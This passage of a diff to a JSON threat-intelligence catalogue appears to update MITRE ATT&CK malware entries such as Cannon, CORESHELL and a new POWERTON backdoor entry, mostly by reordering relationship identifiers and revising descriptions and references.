"https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/", + "https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/" + ], + "synonyms": [ + "Cannon" + ] + }, + "related": [ + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "d20b397a-ea47-48a9-b503-2e2a3551e11d", + "value": "Cannon - S0351" }, { "description": "[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit used by [APT28](https://attack.mitre.org/groups/G0007). It has been deployed along with [Downdelph](https://attack.mitre.org/software/S0134) to execute and hide that malware. (Citation: ESET Sednit Part 3) (Citation: Sekoia HideDRV Oct 2016)", @@ -14386,14 +16583,14 @@ "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14406,6 +16603,55 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ @@ -14413,6 +16659,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -14427,41 +16680,6 @@ ], "type": "uses" }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -14470,28 +16688,7 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14505,7 +16702,7 @@ "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14548,34 +16745,6 @@ ], "type": "uses" }, - { - "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -14583,34 +16752,6 @@ ], "type": "uses" }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", "tags": [ @@ -14626,7 +16767,14 @@ "type": "uses" }, { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14638,6 +16786,55 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "af2ad3b7-ab6a-4807-91fd-51bcaff9acbb", @@ -14680,13 +16877,6 @@ ], "type": "uses" }, - { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ @@ -14700,13 +16890,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "234e7770-99b0-4f65-b983-d3230f76a60b", "value": "Janicab - S0163" }, { - "description": "[CORESHELL](https://attack.mitre.org/software/S0137) is a downloader used by [APT28](https://attack.mitre.org/groups/G0007). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL. It has also been referred to as Sofacy, though that term has been used widely to refer to both the group [APT28](https://attack.mitre.org/groups/G0007) and malware families associated with the group. (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)", + "description": "[CORESHELL](https://attack.mitre.org/software/S0137) is a downloader used by [APT28](https://attack.mitre.org/groups/G0007). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)", "meta": { "external_id": "S0137", "mitre_platforms": [ @@ -14715,10 +16912,12 @@ "refs": [ "https://attack.mitre.org/software/S0137", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", - "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" + "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf", + "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/" ], "synonyms": [ "CORESHELL", + "Sofacy", "SOURFACE" ] }, @@ -14744,6 +16943,20 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -14759,7 +16972,7 @@ "type": "uses" }, { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14773,21 +16986,7 @@ "type": "uses" }, { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14838,6 +17037,75 @@ "uuid": "0e18b800-906c-4e44-a143-b11c72b3448b", "value": "FLIPSIDE - S0173" }, + { + "description": "[POWERTON](https://attack.mitre.org/software/S0371) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://attack.mitre.org/groups/G0064). At least two variants of the backdoor have been identified, with the later version containing improved functionality.(Citation: FireEye APT33 Guardrail)", + "meta": { + "external_id": "S0371", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0371", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html" + ], + "synonyms": [ + "POWERTON" + ] + }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "e85cae1a-bce3-4ac4-b36b-b00acac0567b", + "value": "POWERTON - S0371" + }, { "description": "[Marcher](https://attack.mitre.org/software/S0317) is Android malware that is used for financial fraud. (Citation: Proofpoint-Marcher)", "meta": { @@ -14862,14 +17130,14 @@ "type": "uses" }, { - "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483", + "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14919,14 +17187,14 @@ "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14952,6 +17220,13 @@ ] }, "related": [ + { + "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", "tags": [ @@ -14966,13 +17241,6 @@ ], "type": "uses" }, - { - "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ @@ -15041,55 +17309,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -15097,34 +17316,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ @@ -15132,12 +17323,96 @@ ], "type": "uses" }, + { + "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "00c3bfcb-99bd-4767-8c03-b08f585f5c8a", @@ -15194,14 +17469,14 @@ "type": "uses" }, { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -15214,6 +17489,13 @@ ], "type": "uses" }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -15221,13 +17503,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -15235,20 +17510,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ @@ -15262,6 +17523,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "dc5d1a33-62aa-4a0c-aa8c-589b87beb11e", @@ -15314,7 +17589,14 @@ "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -15335,14 +17617,7 @@ "type": "uses" }, { - "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -15446,13 +17721,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -15466,6 +17734,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "0b32ec39-ba61-4864-9ebe-b4b0b73caf9a", @@ -15501,20 +17776,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -15530,7 +17791,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -15543,13 +17811,6 @@ ], "type": "uses" }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -15570,6 +17831,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "5f9f7648-04ba-4a9f-bb4c-2a13e74572bd", @@ -15605,62 +17880,6 @@ ], "type": "uses" }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ @@ -15668,34 +17887,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ @@ -15703,6 +17894,34 @@ ], "type": "uses" }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 